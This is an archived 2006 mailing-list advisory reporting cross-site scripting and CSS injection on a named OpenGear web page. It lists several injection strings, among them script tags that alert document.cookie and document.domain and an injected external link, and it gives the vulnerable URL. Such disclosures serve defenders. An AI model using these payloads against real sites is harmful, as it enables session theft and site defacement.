|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
XSS Bug in OpenGear Server Website
Aditya
Metaeye.Org
Date: Mon Apr 24 2006 - 09:50:40 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
0x0*] Advisory
==============
Web Penetrated By:- AdityaMetaeye.Org
=======================================
Hit :- Site Manipulation.
====
Vulnerability :- XSS Injection && CSS Injection OpenGear WebSite
==============
BrowserStatus :- Windows IE 6.0
==============
Injections :-
========== 0x01] ' && ""
0x02] <script>Javascript:alert("Penetrated");</script>
0x03] <p>Penetrated</p>
0x04] <a href ="www.zeroknock.cjb.net">ZeroKnock</a>
0x05] '';!--"<CSS_Check>=&{()}
0x06] '<script>javascript:alert(document.cookie);</script>
0x07] '<script>javascript:alert(document.domain);</script>
Result:-Opengear.com with alert injection.
0x01] document.domain Injection Yields --> Opengear.com
0x02] document.cookie Injection Yields --> Empty string
0x03] Remote Linking Is Possible <a href=""></a> Working.
0x04] The OutBound Attack Is Also Definitive.
Site :- http://www.Opengear.com
=======
Vulnerable Link:
================ http://www.opengear.com/cm4000_nwcontact.html
Explanation :-
=============
[+] Poorly Coded Modules.
[+] No Patch For Ignorance.
=========================================================
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]